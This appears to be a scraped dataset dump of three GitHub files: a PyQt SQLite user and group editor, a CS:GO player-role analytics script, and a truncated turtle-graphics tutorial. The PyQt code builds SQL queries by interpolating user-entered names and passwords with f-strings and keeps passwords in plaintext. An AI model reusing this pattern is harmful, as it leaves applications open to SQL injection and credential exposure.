self.remove:\n\t\t\tif not query.exec(f'DELETE FROM user_groups WHERE group_id = {self.ui.twMain.item(self.ui.twMain.currentRow(), 0).data(Qt.UserRole)} AND user_id = {c}'):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not delete the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\n\t# Check which items need to be added to the users-groups table\n\tdef insertToTableUserGroups(self):\n\t\tfor i in range(self.ui.twListInMain.rowCount()):\n\t\t\tif self.ui.twListInMain.item(i, 0).data(Qt.UserRole) == 0:\n\t\t\t\tself.insertToTableUserGroupsProcess(i)\n\n\t# Add an item to the users-groups table\n\tdef insertToTableUserGroupsProcess(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tgroup = self.ui.twMain.item(self.ui.twMain.currentRow(),0).data(Qt.UserRole)\n\t\tuserName = self.ui.twListInMain.item(i,0).text()\n\t\tqStr = f'INSERT INTO user_groups(user_id, group_id) VALUES((SELECT id FROM users WHERE name=\"{userName}\"),{group})'\n\t\tif not query.exec(qStr):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not add the row:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.getLastIdUserGroups(i)\n\n\t# Remove items from a table\n\tdef deleteFromTable (self, table):\n\t\tquery = QSqlQuery(self.db)\n\t\tfor c in self.remove:\n\t\t\tif not query.exec(f'DELETE FROM {table} WHERE id = {c}'):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not delete the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\n\t# Insert into the users table\n\tdef insertToTableUsers (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text() and self.ui.twSimple.item(i ,1).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tpassword = self.ui.twSimple.item(i ,1).text()\n\t\t\tqStr = f\"INSERT INTO users(name, password) VALUES('{name}','{password}')\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not add the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\tself.getLastId(i)\n\n\t# Insert into the groups table\n\tdef insertToTableGroups (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tqStr = f\"INSERT INTO groups(name) VALUES('{name}')\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not add the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\tself.getLastId(i)\n\n\t# Get the id of the last row added to the users-groups table\n\tdef getLastIdUserGroups(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tqStr = f\"SELECT last_insert_rowid()\"\n\t\tif not query.exec(qStr) or not query.next():\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not select the last row:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.ui.twListInMain.item(i ,0).setData(Qt.UserRole, query.value(0))\n\n\t# Get the last inserted id\n\tdef getLastId (self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tqStr = f\"SELECT last_insert_rowid()\"\n\t\tif not query.exec(qStr) or not query.next():\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not select the last row:\\n' + query.lastError().text())\n\t\t\treturn\n\t\tself.ui.twSimple.item(i ,0).setData(Qt.UserRole, query.value(0))\n\n\t# Update the users table\n\tdef updateTableUsers(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text() and self.ui.twSimple.item(i ,1).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tpassword = self.ui.twSimple.item(i ,1).text()\n\t\t\tidC = self.ui.twSimple.item(i, 0).data(Qt.UserRole)\n\t\t\tqStr = f\"UPDATE users SET name = '{name}', password = '{password}' WHERE id = {idC}\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not update the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\n\t# Update the groups table\n\tdef updateTableGroups(self, i):\n\t\tquery = QSqlQuery(self.db)\n\t\tif self.ui.twSimple.item(i ,0).text():\n\t\t\tname = self.ui.twSimple.item(i ,0).text()\n\t\t\tidC = self.ui.twSimple.item(i, 0).data(Qt.UserRole)\n\t\t\tqStr = f\"UPDATE groups SET name = '{name}' WHERE id = {idC}\"\n\t\t\tif not query.exec(qStr):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not update the row:\\n' + query.lastError().text())\n\t\t\t\treturn\n\t\t\n\t# Decide what to do with each row (insert or update)\n\tdef updateTable(self):\n\t\tfor i in range(self.ui.twSimple.rowCount()):\n\t\t\tif self.ui.twSimple.item(i, 0).data(Qt.UserRole) == 0:\n\t\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\t\tself.insertToTableUsers(i)\n\t\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\t\tself.insertToTableGroups(i)\n\t\t\telse:\n\t\t\t\tif self.ui.tableWidget.currentRow() == 0:\n\t\t\t\t\tself.updateTableUsers(i)\n\t\t\t\tif self.ui.tableWidget.currentRow() == 1:\n\t\t\t\t\tself.updateTableGroups(i)\n\t\t\t\t\t\n\t# Selection-change handler for the table listing the database tables\n\t@pyqtSlot()\n\tdef on_tableWidget_itemSelectionChanged(self):\n\t\tif not len(self.ui.tableWidget.selectedItems()):\n\t\t\treturn\n\t\titem = self.ui.tableWidget.selectedItems()[0]\n\t\tself.prepareTables(item.data(Qt.UserRole))\n\t\tself.remove.clear()\n\n\t# Prepare the editing tables\n\tdef prepareTables(self, dataList):\n\t\tif dataList[1]:\n\t\t\tself.prepareSimple(dataList[0])\n\t\telse:\n\t\t\tself.prepareConnection(dataList[0])\n\n\t# Selection-change handler for the roles table\n\t@pyqtSlot()\n\tdef on_twMain_itemSelectionChanged(self):\n\t\tif not len(self.ui.twMain.selectedItems()):\n\t\t\treturn\n\t\titem = self.ui.twMain.selectedItems()[0]\n\t\tself.prepareUserGroupsCompliance(item.data(Qt.UserRole))\n\t\tself.remove.clear()\n\t\tself.userId.clear()\n\n\t# Add-arrow button handler\n\t@pyqtSlot()\n\tdef on_tbtnAddTo_clicked(self):\n\t\tif self.ui.twAll.currentRow() >= 0:\n\t\t\tuser = self.ui.twAll.item(self.ui.twAll.currentRow(),0).text()\n\t\t\tlastStr = self.ui.twListInMain.rowCount()\n\t\t\tself.ui.twListInMain.insertRow(lastStr)\n\t\t\tself.ui.twListInMain.setItem(lastStr, 0, QTableWidgetItem(user))\n\t\t\tself.ui.twListInMain.item(lastStr, 0).setData(Qt.UserRole, 0)\n\n\t# Remove-arrow button handler\n\t@pyqtSlot()\n\tdef on_tbtnRemoveFrom_clicked(self):\n\t\tif self.ui.twListInMain.currentRow() >= 0:\n\t\t\titem = self.ui.twListInMain.currentRow()\n\t\t\tidC = self.ui.twListInMain.item(item, 0).data(Qt.UserRole)\n\t\t\tif idC != 0:\n\t\t\t\tself.remove.append(idC)\n\t\t\tself.ui.twListInMain.removeRow(item)\n\n\t# Prepare \"link\"-type tables\n\tdef prepareConnection(self, name):\n\t\tself.ui.stackedWidget.setCurrentIndex(1)\n\t\tif name == 'user_groups':\n\t\t\tres = self.prepareUserGroups()\n\t\telse:\n\t\t\tres = False\n\t\tif res:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(True)\n\t\telse:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(False)\n\t\t\n\t# Prepare simple tables\n\tdef prepareSimple(self, name):\n\t\tself.ui.stackedWidget.setCurrentIndex(0)\n\t\tself.tableName = name\n\t\t\n\t\tif name == 'users':\n\t\t\tres = self.prepareUsers()\n\t\telif name == 'groups':\n\t\t\tres = self.prepareGroups()\n\t\telse:\n\t\t\tres = False\n\t\tif res:\n\t\t\tself.ui.actionAdd.setEnabled(True)\n\t\t\tself.ui.actionDelete.setEnabled(True)\n\t\t\tself.ui.actionSave.setEnabled(True)\n\t\telse:\n\t\t\tself.ui.actionAdd.setEnabled(False)\n\t\t\tself.ui.actionDelete.setEnabled(False)\n\t\t\tself.ui.actionSave.setEnabled(False)\n\t\t\n\t# Prepare the users table\n\tdef prepareUsers(self):\n\t\tself.ui.twSimple.setRowCount(0)\n\t\tself.ui.twSimple.setColumnCount(2)\n\t\tself.ui.twSimple.setHorizontalHeaderItem(0, QTableWidgetItem('User name'))\n\t\tself.ui.twSimple.setHorizontalHeaderItem(1, QTableWidgetItem('Password'))\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tsql = 'SELECT id, name, password FROM users'\n\t\t\n\t\tif not query.exec(sql):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the list of users:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twSimple.insertRow(i)\n\t\t\tself.ui.twSimple.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twSimple.setItem(i, 1, QTableWidgetItem(query.value(2)))\n\t\t\tself.ui.twSimple.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\ti += 1\n\t\tself.ui.twSimple.resizeColumnsToContents()\n\t\treturn True\n\t\n\t# Prepare the groups table\n\tdef prepareGroups(self):\n\t\tself.ui.twSimple.setRowCount(0)\n\t\tself.ui.twSimple.setColumnCount(1)\n\t\tself.ui.twSimple.setHorizontalHeaderItem(0, QTableWidgetItem('Group name'))\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tsql = 'SELECT id, name FROM groups'\n\t\t\n\t\tif not query.exec(sql):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the list of groups:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twSimple.insertRow(i)\n\t\t\tself.ui.twSimple.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twSimple.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\ti += 1\n\t\tself.ui.twSimple.resizeColumnsToContents()\n\t\treturn True\n\t\n\t# Prepare the users-groups table\n\tdef prepareUserGroups(self):\n\t\tself.ui.twMain.clear()\n\t\tself.ui.twMain.setColumnCount(1)\n\t\tself.ui.twMain.setRowCount(0)\n\t\tself.ui.twMain.setHorizontalHeaderItem(0, QTableWidgetItem('Roles'))\n\t\tself.ui.twMain.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tsql = 'SELECT id, name FROM groups'\n\t\t\n\t\tif not query.exec(sql):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the list of groups:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twMain.insertRow(i)\n\t\t\tself.ui.twMain.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twMain.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\tself.ui.twMain.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\ti += 1\n\t\tself.ui.twMain.resizeColumnsToContents()\n\t\tself.ui.twAll.clear()\n\t\tself.ui.twAll.setColumnCount(1)\n\t\tself.ui.twAll.setRowCount(0)\n\t\tself.ui.twAll.setHorizontalHeaderItem(0, QTableWidgetItem('Users'))\n\t\tself.ui.twAll.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tsql = 'SELECT id, name FROM users'\n\t\t\n\t\tif not query.exec(sql):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the list of users:\\n' + query.lastError().text())\n\t\t\treturn False\n\t\t\n\t\ti = 0\n\t\twhile query.next():\n\t\t\tself.ui.twAll.insertRow(i)\n\t\t\tself.ui.twAll.setItem(i, 0, QTableWidgetItem(query.value(1)))\n\t\t\tself.ui.twAll.item(i, 0).setData(Qt.UserRole, query.value(0))\n\t\t\tself.ui.twAll.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\ti += 1\n\t\tself.ui.twAll.resizeColumnsToContents()\n\t\treturn True\n\n\t# Prepare the table of users assigned to the selected group\n\tdef prepareUserGroupsCompliance(self, data):\n\t\tself.ui.twListInMain.clear()\n\t\tself.ui.twListInMain.setRowCount(0)\n\t\tself.ui.twListInMain.setColumnCount(1)\n\t\tself.ui.twListInMain.setHorizontalHeaderItem(0, QTableWidgetItem('Assigned to the role'))\n\t\tself.ui.twListInMain.horizontalHeader().setStretchLastSection(True)\n\t\t\n\t\tquery = QSqlQuery(self.db)\n\t\tsql = f'SELECT user_id FROM user_groups WHERE group_id = {data}'\n\t\t\n\t\tif not query.exec(sql):\n\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the list of users in this group:\\n' + query.lastError().text())\n\t\t\treturn False\n\n\t\twhile query.next():\n\t\t\tself.userId.append(query.value(0))\n\n\t\tfor i in range(0, len(self.userId)):\n\t\t\tuserId = self.userId[i]\n\t\t\tsql = f'SELECT name FROM users WHERE id = {userId}'\n\t\t\tif not query.exec(sql):\n\t\t\t\tQMessageBox.critical(self, 'Error', 'Could not fetch the user name:\\n' + query.lastError().text())\n\t\t\t\treturn False\n\t\t\twhile query.next():\n\t\t\t\tself.ui.twListInMain.insertRow(i)\n\t\t\t\tself.ui.twListInMain.setItem(i, 0, QTableWidgetItem(query.value(0)))\n\t\t\t\tself.ui.twListInMain.item(i, 0).setData(Qt.UserRole, self.userId[i])\n\t\t\t\tself.ui.twListInMain.item(i, 0).setFlags(Qt.ItemIsSelectable|Qt.ItemIsEnabled)\n\t\t\tself.ui.twListInMain.resizeColumnsToContents()\n\t\treturn True","repo_name":"uGodNick/python-table","sub_path":"src/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":18167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41502898428","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 7 19:09:32 2021\n\nMake method to loop through single round to determine which player fills what role\ncreate train set size vs accuracy graph\n\nThe General Making Choices Approach\n\n####Raymond To-Do####\nTRADE_KILL \n\n####Grant To-Do####\n\n####PreGame##### Making use of Clustering \n\nFinish clustering with new features, classify test set into clusters, make a new column for cluster\nDetermine success and failure statistics for team comp matchups (Team Gamma vs Team Omega)\n - 11111 vs 01342\n - Who is 11111's best and worst matchup\nDetermine which individual team comp is the most winningest -\n - 11111 win rate alone\nWin percentage of team comp before and after switch\n - How does 11111 do on T vs CT?\nIf the matchup between teams is bad, the AI system could recommend a different comp\n\nDo individual players occupy different clusters?\nCheck if individual players occur in different games? \n\n\n\n####MidGame/Post-Plant Applied Statistics#####\n\nWithin +-5 seconds of A site bomb plant determine where T players are playing (boxes) regardless of the round outcome\nLook at their team comp -> is it a successful team comp? Or do they lose because of the wrong combination of players and matchup? \nDo they play in the positions we think are supposed to succeed based off heat maps or statistics of successful box locations for individual player types, their clusters? Or do they succeed from new positions? 
How is the team spread spatially?\n We can extract spatial features of players relative to one another and to the bombsite and perform statistics on what wins\n\n# # # (Later) Have AI learn from each role (guess best move for each role)\n\n@author: Grant\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#import seaborn as sns\nimport os\nimport pickle\nfrom src import Writer\nimport sim as sim\nwriter = Writer()\n\n#make empty df \ndata = pd.DataFrame()\n\niterations = 245\n\n#gets copy of original data\nwriter.main()\ndata = writer.get_data()\n\n#reading\nwith open('file_to_rounds.txt', 'rb') as handle:\n _input = handle.read()\n \n\n#dictionary\nfile_to_rounds = pickle.loads(_input)\n\n#main df\ncolumn_names = ['ID','Health','damage','kills','rifle','sniper','pistol','smg',\n 'grenade','preplant kill','postplant kill','fast_kill_rating (first_kill)',\n 'time of kills','total kills','total deaths', 'avg kill time', \n 'assists', 'team','positioning type', 'last x', 'last y', \n 'alone kills', 'distance to A bomb (on kill list)', 'Avg Distance to A bomb (on kill)',\n 'times in catwalk_box', 'times in topmid_box', 'times in chair_box', 'times in midlane_box', 'times in underpass_box', 'times in window_box',\\\n 'times in stairs_box', 'times in tetris_box', 'times in sandwhich_box', 'times in Asite_box', 'times in firebox_box', 'times in jungle_box', 'times in connector_box',\n 'times in opening_box', 'times in opening2_box', 'times in A_main_box', 'times in T_ramp_box', 'times in hell_box', 'times in palace_box', 'times in pillars_box', \n 'times in ticket_box', 'times in CT_ramp_box', 'alone_death', 'total_distance_traveled']\n\nmain_df = pd.DataFrame(columns = column_names)\n\n#get all player ids\ndef find_team_ids(file):\n list_of_ct_ids = []\n list_of_t_ids = []\n\n game_data = data[(data['file'] == file) & (data['round'] < 16) & (data['att_id'] != 0)]\n for index, row in game_data.iterrows():\n if row['att_side'] == \"CounterTerrorist\":\n if row['att_id'] not in list_of_ct_ids:\n list_of_ct_ids.append(row['att_id'])\n \n else:\n if row['att_id'] not in list_of_t_ids:\n list_of_t_ids.append(row['att_id'])\n \n return list_of_ct_ids, list_of_t_ids\n\ndef distance_between_points(P, Q):\n \n x1 = P[0]\n x2 = Q[0]\n y1 = P[1]\n y2 = Q[1]\n \n result = ((((x2 - x1 )**2) + ((y2-y1)**2) )**0.5)\n return result\n\ndef all_roles_in_round(df, file, rnds): \n \n############################### VARIABLES ###############################\n ct_list, t_list = find_team_ids(file)\n\n #print(\"ct\", ct_list)\n #print(\"t\", t_list)\n \n if len(ct_list) < 5:\n #print(\"CT LIST TOO SMALL:\", len(ct_list))\n #print(\"Skipping\")\n return\n \n if len(t_list) < 5:\n #print(\"T LIST TOO SMALL:\", len(t_list))\n #print(\"Skipping\")\n return\n \n \n \n ''' GAME VARIABLES '''\n #ID, Health, damage, kills, rifle, sniper, pistol, smg, grenade, preplant kill(9), \n # postplant kill, fast_kill_rating (first_kill), time of kills, total kills(13), \n #total deaths, avg kill time, assists, 'team', positioning type (att or vic)(18), \n # last x (vic/att), last y(vic/att), alone kills, \n # distance to A bomb (on kill list), Avg Distance to A bomb (on kills)\n #'times in catwalk_box', 'times in topmid_box', 'times in chair_box', 'times in midlane_box', 'times in underpass_box', 'times in window_box'(29), \n #'times in stairs_box', 'times in tetris_box', 'times in sandwhich_box', 'times in Asite_box', 'times in firebox_box', 'times in jungle_box', 'times in connector_box',\n # 'times in opening_box', 
'times in opening2_box', 'times in A_main_box', 'times in T_ramp_box', 'times in hell_box', 'times in palace_box', 'times in pillars_box', \n # 'times in ticket_box', 'times in CT_ramp_box', alone_death, total_distance_traveled (47)\n \n def new_player(pid, team):\n # build one 48-entry feature vector in the column_names order documented above\n return [pid, 100] + [0]*10 + [[]] + [0]*4 + [team, \"N/A\"] + [0]*3 + [[]] + [0]*25\n \n # the first five ids on each side fill the roster, exactly as the old hand-written literals did\n all_players = [new_player(pid, \"CounterTerrorist\") for pid in ct_list[:5]] + \\\n [new_player(pid, \"Terrorist\") for pid in t_list[:5]]\n \n \n ''' ROUNDS LOOP '''\n \n # single_game = data[(data['file'] == file)]\n # highest_round = single_game.loc[single_game['round'].idxmax()]\n # print(\"Running file\", file,\"with max round\", highest_round['round'], \"...\")\n # for i in range(1, highest_round['round'] + 1):\n \n rounds = rnds\n print(\"Running file\", file, \"with\", len(rounds), \"rounds...\")\n for i in rounds:\n \n #reset health at beginning of round\n for player in all_players:\n player[1] = 100\n\n \n ''' ROUND VARIABLES '''\n first_dmg_turn_counter = 20\n first_dmg_award = [1,1,2,2,3,3,4,4,5,5]\n first_dmg_index = len(first_dmg_award) - 1\n assists = []\n \n ''' ROWS LOOP '''\n print(\"Running round\", i,\"...\")\n single_round = data[(data['round'] == i) & (data['file'] == file)]\n \n for index, row in single_round.iterrows():\n '''when a player dies in row do calculations then'''\n victim = []\n attacker = []\n kill_flag = False\n for curr_player in all_players:\n pos_data = np.array([[row['attacker_mapX'], row['attacker_mapY']], [row['victim_mapX'], row['victim_mapY']]])\n x, y = pos_data.T\n \n if curr_player[0] == row['vic_id']:\n victim = curr_player\n \n #Set postioning type == VIC\n victim[18] = \"VIC\"\n\n 
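# Feature-vector index reminder (from column_names above): 18 = positioning type, 19/20 = last x/y,\n # 21 = alone kills, 22 = per-kill distances to the A bomb, 24..45 = box visit counters,\n # 46 = alone deaths, 47 = total distance traveled.\n 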
#total distance travel (victim check)\n if victim[19] and victim[20] != 0: \n \n victim[47] += abs(distance_between_points([victim[19], victim[20]],[x[1], y[1]]))\n # print(victim[1])\n # print(\"victim last known x/y (\", victim[19], victim[20], \")\")\n # print(\"victim current x/y (\", x[1], y[1], \")\" )\n # print(\"victim DBP: \", abs(distance_between_points([victim[19], victim[20]],[x[1], y[1]])))\n # print(\"victim total distance: \", victim[47])\n # print()\n \n #Set last x and last y\n victim[19] = row['victim_mapX']\n victim[20] = row['victim_mapY']\n \n victim[1] -= row['hp_dmg']\n \n if curr_player[0] == row['att_id']:\n attacker = curr_player\n \n #Set postioning type == ATT\n attacker[18] = \"ATT\"\n \n #total distance travel (attacker check)\n if attacker[19] and attacker[20] != 0: \n attacker[47] += abs(distance_between_points([attacker[19], attacker[20]],[x[0], y[0]]))\n # print(attacker[1])\n # print(\"attacker last known x/y (\", attacker[19], attacker[20], \")\")\n # print(\"attacker current x/y (\", x[0], y[0], \")\" )\n # print(\"attacker DBP: \", abs(distance_between_points([attacker[19], attacker[20]],[x[0], y[0]])))\n # print(\"attacker total distance: \", attacker[47])\n # print()\n \n \n #Set last x and last y\n attacker[19] = row['attacker_mapX']\n attacker[20] = row['attacker_mapY']\n \n attacker[2] += row['hp_dmg']\n \n if len(attacker) != 0 and len(victim) != 0:\n \n #if a attacker does damage give him an assist,\n if ([attacker[0], victim[0]]) not in assists:\n assists.append([attacker[0], victim[0]])\n \n \n if victim[1] <= 0 and kill_flag == False:\n kill_flag = True\n \n \n #alone kill and alone death\n alone_kill = True\n alone_death = True\n distance_to_nearest_teammate = 99999\n for player in all_players:\n if ((player[17] == attacker[17]) and (player[1] > 0) and player[0] != attacker[0]):\n result = distance_between_points([player[19], player[20]], [attacker[19], attacker[20]])\n if result < distance_to_nearest_teammate:\n distance_to_nearest_teammate = result\n if result < 400:\n alone_kill = False\n if ((player[17] == victim[17]) and (player[1] > 0) and player[0] != victim[0]):\n result2 = distance_between_points([player[19], player[20]], [victim[19], victim[20]])\n if result2 < distance_to_nearest_teammate:\n distance_to_nearest_teammate = result2\n if result2 < 400:\n alone_death = False\n \n if alone_kill == True:\n attacker[21] += 1\n if alone_death == True:\n victim[46] += 1\n\n #remove assist from list when they kill\n assists.remove([attacker[0], victim[0]])\n attacker[3] += 1\n \n if row['wp_type'] == 'Rifle':\n attacker[4] += 1\n if row['wp_type'] == 'Sniper':\n attacker[5] += 1\n if row['wp_type'] == 'Pistol':\n attacker[6] += 1\n if row['wp_type'] == 'SMG':\n attacker[7] += 1\n if row['wp_type'] == 'Grenade':\n attacker[8] += 1\n if row['is_bomb_planted'] != True:\n attacker[9] += 1\n if row['is_bomb_planted'] == True:\n attacker[10] += 1\n if first_dmg_turn_counter > 0 and attacker[11] == 0 and first_dmg_index >= 0:\n attacker[11] = first_dmg_award[first_dmg_index]\n first_dmg_index -= 1\n attacker[12].append(row['seconds'])\n attacker[13] += 1\n victim[14] += 1\n \n #Append distance to A bomb on kill\n attacker[22].append(abs(distance_between_points([attacker[19], attacker[20]], sim.CenterA)))\n \n \n #mid boxes and A_site boxes check (attacker only)\n if row['att_id'] == attacker[0]:\n \n index_counter = 0\n for box in sim.list_of_boxes:\n if (box[0] < x[0] < box[2]) and (box[3] < y[0] < box[1]):\n #print(\"Attacker\", row['att_id'], 
\"in\", box[4],\"box\")\n #print(index_counter)\n if index_counter == 0:\n attacker[24] += 1\n \n elif index_counter == 1:\n attacker[25] += 1\n \n elif index_counter == 2:\n attacker[26] += 1\n \n elif index_counter == 3:\n attacker[27] += 1\n \n elif index_counter == 4:\n attacker[28] += 1\n \n elif index_counter == 5:\n attacker[29] += 1 \n \n elif index_counter == 6:\n attacker[30] += 1\n \n elif index_counter == 7:\n attacker[31] += 1\n \n elif index_counter == 8:\n attacker[32] += 1\n \n elif index_counter == 9:\n attacker[33] += 1\n \n elif index_counter == 10:\n attacker[34] += 1\n \n elif index_counter == 11:\n attacker[35] += 1\n \n elif index_counter == 12:\n attacker[36] += 1\n \n elif index_counter == 13:\n attacker[37] += 1\n \n elif index_counter == 14:\n attacker[38] += 1\n \n elif index_counter == 15:\n attacker[39] += 1\n \n elif index_counter == 16:\n attacker[40] += 1\n \n elif index_counter == 17:\n attacker[41] += 1\n \n elif index_counter == 18:\n attacker[42] += 1\n \n elif index_counter == 19:\n attacker[43] += 1\n \n elif index_counter == 20:\n attacker[44] += 1\n \n else:\n attacker[45] += 1\n index_counter += 1\n \n \n\n ''' POST ROUND CHECKS '''\n for player in all_players:\n \n time_delta = 0\n #assists checks\n if len(assists) > 0:\n for assist_pair in assists:\n if assist_pair[0] == player[0]:\n player[16] += 1\n assists.remove(assist_pair)\n \n #average time of kills\n if player[12] and len(player[12]) > 1:\n for i in range(len(player[12])):\n if (i + 1) < (len(player[12])):\n time_delta += player[12][i+1] - player[12][i]\n else:\n #will get more accurate each round and harder to change\n player[15] = time_delta/(len(player[12]) - 1)\n \n #average of distance to A bomb kills \n if player[22] and len(player[22]) > 1:\n for i in range(len(player[22])):\n if (i + 1) < (len(player[22])):\n time_delta += player[22][i+1] - player[22][i]\n else:\n #will get more accurate each round and harder to change\n player[23] = abs(time_delta/(len(player[22]) - 1))\n\n ''' POST ROUND VARIABLE CHANGES '''\n first_dmg_turn_counter -= 1\n \n \n \n players_df = pd.DataFrame(all_players)\n players_df.columns = column_names\n return players_df\n \n \nall_files = data.file.unique()\n\n\n\nfor f,rnd in file_to_rounds.items():\n round_df = all_roles_in_round(data, f, rnd)\n main_df = main_df.append(round_df, ignore_index = True)\n \n \n# for f in all_files:\n# if index == iterations:\n# break\n# round_df = all_roles_in_round(data, f)\n# #print('--------------------------------------')\n# main_df = main_df.append(round_df, ignore_index = True)\n \n# index += 1\n\n#Remove outlier players with a K/D less than 0.2\n# main_df = main_df.loc[main_df['total deaths'] > 0]\n# main_df = main_df.loc[main_df['total kills']/main_df['total deaths'] > 0.2]\n\n#main_df.to_csv('doNOTdelete.csv', index = False, encoding='utf-8')\n \nmain_df = main_df.drop(['time of kills', 'Health', 'team', 'positioning type', 'last x', 'last y', 'distance to A bomb (on kill list)'], axis=1)\npd.set_option(\"display.max_rows\", None, \"display.max_columns\", None, 'expand_frame_repr', False)\n\n#save to csv\nmain_df.to_csv('with_file_to_rounds.csv', index = False, encoding='utf-8')\n \n\n\n\n \n \n \n\n\n\n\n\n","repo_name":"G-Armstrong/CSGO-Spatial-Analytics","sub_path":"roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":21363,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"19642390040","text":"#!/usr/bin/python\n# coding:utf-8\n\nimport 
turtle \n\n# Canvas (drawing area) settings\n'''\nOption 1: screensize\nParameters: width, height, background color\n'''\n#turtle.screensize(canvwidth=400, canvheight=300, bg='blue')\n\n'''\nOption 2: setup\nwidth, height: integers mean pixels; floats mean a fraction of the screen (defaults: width=0.5, height=0.75)\nstartx, starty give the position of the top-left corner in pixels; by default the window is centered\n if startx is positive it is measured from the left edge, if negative from the right edge\n if starty is positive it is measured from the top edge, if negative from the bottom edge\n'''\nturtle.setup(width=0.5, height=0.75, startx=0, starty=0)\n\n# hide the cursor; alias: ht\nturtle.hideturtle()\n# show the cursor; alias: st\nturtle.showturtle()\n# query whether the cursor is visible\nisShow = turtle.isvisible()\nprint(isShow)\n# reset the pen to the origin, equivalent to turtle.goto(0,0) plus turtle.setheading(0)\nturtle.home()\n# set the pen color and the fill color\nturtle.color('red', 'yellow')\n\n\n'''\n# Pen settings\n# set the pen width; alias: width\nturtle.pensize(width=10)\n# set the pen color; accepts a string such as \"blue\" or an RGB value such as (255,2,55)\nturtle.pencolor('blue')\n# move without drawing; alias: pu | up\nturtle.penup()\n# draw while moving; alias: pd | down\nturtle.pendown()\n# whether the pen is drawing: True after pendown, False after penup\nturtle.isdown()\n# drawing speed in the range [0,10]; the presets (1,3,6,10,0) map to (slowest, slow, normal, fast, fastest)\nturtle.speed(1)\n\n# Movement (the pen starts at (0,0) by default)\n# move distance pixels in the current heading; alias: fd\nturtle.forward(distance=100)\n# move distance pixels against the current heading; alias: back | bk\n#turtle.backward(distance=200)\n# rotate clockwise by the given angle; alias: rt\nturtle.right(90)\nturtle.backward(distance=200)\n# rotate counterclockwise by the given angle; alias: lt\nturtle.left(90)\nturtle.backward(distance=100)\n# move the pen to the given position; alias: setpos | setposition | goto\nturtle.goto(x=0, y=0)\n# draw a circle; the parameters are radius, extent and number of steps\n# a positive radius puts the center to the pen's left, a negative one to its right; the last two parameters may be omitted (default: 360 degrees, 1 step)\nturtle.circle(radius=-100, extent=180, steps=6)\n\n# set the fill color; accepts a string such as \"blue\" or an RGB value such as (255,2,55)\nturtle.fillcolor('red')\n# start filling the shape\nturtle.begin_fill()\n# finish filling the shape\nturtle.end_fill()\n\n# write text:\nturtle.write(\"王 江 烟\", move=True, align='left', font=('Arial',30,'normal'))\n# set the x coordinate\nturtle.setx(x=100)\n# set the y coordinate\nturtle.sety(y=100)\n# set the cursor heading; 